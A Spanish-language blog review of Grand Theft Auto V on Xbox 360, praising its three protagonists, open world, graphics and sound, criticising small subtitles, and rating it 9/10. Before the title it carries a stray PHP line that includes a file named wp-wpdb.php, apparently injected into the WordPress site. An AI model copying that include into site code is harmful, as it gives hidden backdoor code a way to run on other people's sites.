if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Grand Theft Auto V – La Fortaleza de LeChuck

Análisis Grand Theft Auto V

Grand Theft Auto es una saga que a cada lanzamiento ve como crece su leyenda. Información a cuenta gotas, tráilers marcados en el calendario (E incluso retratados a lo Minecraft), y poco gameplay enseñado hasta el lanzamiento del juego. El hype era evidente, y cualquier jugador que se precie se da cuenta de que Rockstar está gestionando la saga para conservar sus virtudes y el hype sin muchas innovaciones pero también sin desgaste sacando GTA’s anuales (Como muchas otras multimillonarias sagas). Grand Theft Auto V (Spin Offs a parte) ya está en casa de miles de personas, y aquí va nuestro análisis (En su versión en Xbox 360) del juego más comentado del mes. ¿Conseguirá ser el GOTY con tan sana competencia?

Una de las grandes novedades de esta quinta parte de GTA es, sin duda, el controlar a tres personajes principales, en lugar de uno como es habitual. Como sabéis, en GTA IV ya se jugó un poco con Nico Bellic y los personajes de los DLC «The Lost and Dammed» y «Ballad of the gay Tony», que veían entremezcladas sus historias aún siendo de «mundos distintos».

Llevando más allá esa idea, Rockstar nos presenta a dos antiguos amigos, Michael y Trevor, a los que se une un novato como Franklin. Ellos tres conformarán una trama donde participarán en grandes golpes y se verán envueltos en rocambolescas historietas de grandes personajes secundarios.

Las mejorías respecto a anteriores Grand Theft Auto en cuanto a su jugabilidad son de mérito. Pareciendo en primera instancia «más de lo mismo», y usando los mismos controles y físicas que en su cuarta entrega, Rockstar nos brinda una mejor base donde podremos intercambiar en casi cualquier momento de personaje para vivir la historia individual de cada uno, y así conocer (y disfrutar) a todos ellos. Esto provoca mucha más adicción al juego ya que cuando solo teníamos un personaje era todo bastante más plano. Teniendo estos tres personajes con personalidad distinta, se hace todo más llevadero y nos hace decidir muchas cosas a lo largo del juego según nuestra forma de jugar. También se ha mejorado mucho la integración de las cinemáticas de cada misión cuando llegamos al punto de su inicio, sin saltos y con la misma cámara habitual acercándose a la conversación.

El autoapuntado sigue como un estándar (Aunque desactivable) a la hora de disparar a los enemigos, haciendo faciles y dinámicos los momentos de acción del juego, como suele ocurrir en cualquiera de los Grand Theft Auto anteriores. Eso sí, dejamos claro que los tiroteos serán enormes y los encontronazos con la ley y otras bandas siguen siendo una parte importante en GTA V, además de aportar sus habituales situaciones disparatadas y totalmente surrealistas.

Tambien vuelven los detalles, misiones secundarias y objetos desperdigados por el mapeado, lo que nos invitará a explorar este gran mundo (El GTA más grande en extensión jamás realizado). Lo interesante es que eso te obligará a descubrir grandes parajes y curiosidades, cada rincón del juego es belleza por ser único, y uno se da cuenta de lo minucioso que ha sido Rockstar a la hora dar vida a San Andreas y Los Santos. Cuando un juego invita a explorar a alguien como yo, que no es en absoluto completista y simplemente disfruta del juego hasta que no es divertido, es que se ha hecho todo de forma excepcional. Creía que el problema lo tenía yo, y no, son los juegos los que a veces no logran captar tu atención para recorrer todo si eso se hace de forma monótona.

Me alegra enormemente que este GTA V nos siga dando diversión, ya que al margen de la historia, de los tacos, o de la violencia, creo que Grand Theft Auto es un juego DIVERTIDO con mayúsculas. Su enorme mundo para explorar de «Sandbox» nos permite hacer lo que nos de la gana, pero es que siempre hay tantas cosas y tan variadas por hacer, que nunca nos aburrimos, y esa es una virtud de la saga que nunca se debe perder. En todo caso, en GTA V podremos hacer más cosas que nunca, aunque algunos echan en falta  detalles de Grand Theft Auto San Andreas de la anterior generación (facilmente comparables al basarse también en San Andreas), con muchas novedades y unas obvias capacidades técnicas notables, adaptando buenamente los niveles de habilidad de los personajes pero dejándose en el tintero cosas como su estado de forma, ya que esta vez no se podrá evolucionar musculando o sobrealimentando sus cuerpos.

Gráficos

Técnicamente estamos ante un trabajo impecable. Seguramente tanto en el apartado de la jugabilidad como técnico la gente comentará «Lo que tuvo que ser GTA IV». Y para mí tienen razón. GTA IV supuso varios pasos atrás incomprensibles respecto a GTA San Andreas. Graficamente es obvio que lo que menos, pero en GTA V sacan toda la potencia de nuestra actual generación para hacernos sentir orgullosos. Resumiendo, la ciudad luce como en GTA IV (Y las físicas de monigotes siguen siendo las mismas), los efectos de iluminación son más imponentes, y le sumamos los excelentes accidentes geográficos que lucía Red Dead Redemption, con montañas, valles, etc. Además, por fin el agua es algo más que el límite del mapeado y además de lucir de forma realista e increíble (Las olas que te arrastrán a la orilla, la espuma, etc) ahora nos permiten bucear y llevar un submarino para tener por primera vez exploración bajo el agua con un nivel de detalle abrumador. Alguna ralentización no empaña la solidez de este gran mundo creado. Quizás si los problemas con las texturas que se han tenido de lanzamiento y el embrollo de instalar o no el segundo disco y donde, habiendo sido la mejor opción, finalmente, el instalar ese segundo disco de juego en un pendrive (En la versión Xbox 360) para que tu consola no salga volando y tampoco haya ese fallo en la carga de texturas. Aún con todo ello, decir que es un salto generacional es decir mucho. Se hace notar ya que las consolas de esta generación no dan para más, por suerte se ha sabido exprimir bien su potencia, pero ya está.

Sonido

Para no deslucir el resto de apartados, tanto la música, con sus variadas emisoras de radio, como los efectos sonoros suenan estupendos. El doblaje del juego en inglés es impecable, seguramente de los mejores que pueda tener un videojuego, aún así, el tamaño de los subtítulos vuelve a ser minúsculo, como nos tiene acostumbrados Rockstar, y a veces hay algún error en los que no aparecen. A parte de eso, sigue siendo un peñazo conducir y tener que leer abajo, teniendo que parar a escuchar y leer el diálogo para no descentrarse en unas carreteras con más tráfico que nunca. Aquí se nota que Rockstar no ha trabajado para hacer que los no angloparlantes puedan disfrutar de la misma forma que ellos mismos.

GTA V es un juego antológico. Sobre gustos no habrá nada escrito, pero GTA V es tan y tan grande, que cada uno encuentra la forma de divertirse con el. Jugar al golf, bucear, sobrevolar la isla o quizás tirarse en paracaídas además de, por supuesto, las más que sabidas persecuciones y tiroteos. En la variedad de un complejo mundo radica la diversión del título, y al margen de toda la polémica, violencia y éxito que pueda tener el juego, es muy triste que algunos videojugadores de toda la vida le quieran quitar méritos. Rockstar ha vuelto a realizar un completo juego, del que a veces pienso que «no es para tanto», y simplemente es un GTA más, pero es que eso y mejorarlo un poco en general, ya es algo que disfrutaremos muchísimo. Si no te gustan este tipo de juegos, ni lo intentes, el juego no innova casi nada, como os digo, solo hay ciertos matices mejorados, como el tema de los personajes, el hecho de devolvernos un mundo más grande y todas esas cositas que a algunos les parece grandioso y a otros no tanto, pero sigue siendo eso, un gran sitio en el que hacer misiones a saco o hacer el cabra por ciudad y monte.

Yo no tuve el hype de otros y en cosas como la ciudad, me esperaba muchas más novedades en la vida de las terceras personas que vemos por las calles. No deja de ser «lo mismo» con algunos eventos del estilo Red Dead Redemption (Ayúdame tal, ayúdame cual…). Por suerte, en otras cosas que no esperaba me ha sorprendido gratamente, como la historia, los personajes (El bizarro de Trévor te hará sacar más de una carcajada, es totalmente imprevisible. Michael y su familia también tienen su miga, sobretodo el hijo, viciado a Call of Duty que no dudará en hacer sentadillas a quién noqueé) y el trabajazo en que cada metro de GTA sea único y más carismático que nunca.
Ahora solo falta jugar a ese prometido GTA Online, que viene incluido con el juego pero dará comienzo a partir del 1 de Octubre, donde prometen que podremos de forma cooperativa realizar nuestros atracos con nuestra propia estrategia para realizarlos y muchas nuevas opciones para darnos lo que queremos, diversión.

Nota: 9/10